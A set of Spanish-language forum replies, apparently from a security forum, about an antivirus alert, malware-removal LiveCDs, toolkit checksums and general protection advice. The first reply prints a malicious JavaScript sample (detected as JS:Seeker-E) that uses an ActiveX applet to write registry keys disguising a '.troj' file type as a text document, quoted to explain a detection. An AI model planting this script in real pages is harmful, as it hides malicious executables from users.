Mensajes

Hola xiruko como puedes ver en la alerta es por un script del siguiente code:

Código [Seleccionar] Expandir

<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");

function f() {
try {
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try {
Shl.RegWrite ("HKCR\\.troj\\", "trojfile");
Shl.RegWrite ("HKCR\\trojfile\\", "Documento de texto");
Shl.RegWrite ("HKCR\\trojfile\\NeverShowExt", "");
Shl.RegWrite ("HKCR\\trojfile\\shell\\open\\command\\", "%1 %*");

}
catch(e) {}
}
catch(e) {}
}

setTimeout("f()", 1000);

</script>

Pegas ese code en un txt lo nombras como "ejemplo.js" y lo subes a analizar.
Aquí tienes el script analizado en Jotti:

Link: http://virusscan.jotti.org/es/scanresult/1e34f284e7944cbc9a58fe2a52a9b38697aaced4

2012-04-21 JS:Seeker-E

Saludos y gracias por el aviso !!!

He estado leyendo el About y tuviste apoyo de gente muy conocida en este campo, me alegro.

Tienes provisto incluir la traducción al español?

Aunque todavía esta en proyecto y al final no se si se lanzará, incluimos tu herramienta en un AIO de análisis de Malware (All in one - Todo en uno). Si se llevara a cabo tenemos tu permiso ¿no?...

Saludos, sigue así buena tool.

Sinceramente, aunque no soy mod ni nada creo que lo de los comentarios se va a hacer caso omiso o en su lugar utilizarlo de papel de water, lo mismo da 

team es el Bluesky el Pr0xxx0r

Me ha empezado a entrar miedo, no se, pedazo de juanker de hotmail, chat de Ares y alguna cosa mas, pero que vamos...

No digo nada mas, un saludo.

Hasta hace poco no he tenido problemas , pero llevo un par de meses que me entran por todos lados.
¿como puedo protegerme mejor?.

Revisaste tener actualizados los plugins del navegador (flash, reader, java)?

Por ahí te pueden entrar bastantes, tener el Sistema Operativo actualizado tambien te ayudará...

Probaste cambiar de Firewall, hay varios y gratuitos, se mejoró algo el de Windows pero los hay mejores.

Añade a tus herramientas de desinfección "Malwarebytes", funciona bastante bien.

Saludos.

Para los que tengan el problema de que no tiene lectora de CD, pueden usar el programa UNetbootin, seguir las instrucciones del siguiente documento:

http://ns2.elhacker.net/aio/Instrucciones%20para%20grabar%20los%20LiveCD%20en%20una%20unidad%20USB.pdf

Inicia desde el CD un LiveCD antimalware, más arriba aconsejan el de Avira, el de Kaspersky tambien elimina ese Ramsonware...

LiveCD Avira: http://dlpro.antivir.com/package/rescue_system/common/en/rescue_system-common-en.iso

LiveCd Kaspersky: http://rescuedisk.kaspersky-labs.com/rescuedisk/updatable/kav_rescue_10.iso

Saludos.

Depende  de tu ISP puede ser que utilice los servidores de Akamai, creo speedy telefonica lo hacía.
Acabo comprobar en mi win7 y el ckecksum es el mismo.

Yo no le daría mucha importáncia, notas algo raro en el comportamineto del PC...

Saludos.

Hola dEMOKING tenias algun problemilla más, supongo lo habrás corregido.
Eliminaste las detecciones de las herramientas.
Si sigues con problemas, postea en este mismo tema tus dudas.

Saludos.

[AIO_elhacker_2012.rar:]

Hola, Oneofseven, el md5 que expones es correcto:

08d7046f39326078e333546a47c7fd00

Corresponde a la ISO del AIO.

Se modificó la interfaz y algun link roto y no se corrigieron los md5, fallo mio.
Tengo que modificar tambien las capturas del post pues como te dije modificamos la interfaz.

Los nuevos md5 correspondientes son:

AIO_elhacker_2012.rar: 4a7a9cb44e94277d936b3a6df1fe1e81

AIO_elhacker_2012.iso: 08d7046f39326078e333546a47c7fd00

Saludos.

Prueba este programa, me solucionó un problema con el driver del wifi de una laptop, descargué el de la página oficial y no funcionaba.
El programa te lo detecta y descarga automáticamente, solo que para instalarlo necesitas la version pro, ningun drama lo ejecutas tu mismo.

http://www.drivereasy.com/

Tambien detecta si los existentes están desactualizados.

Saludos.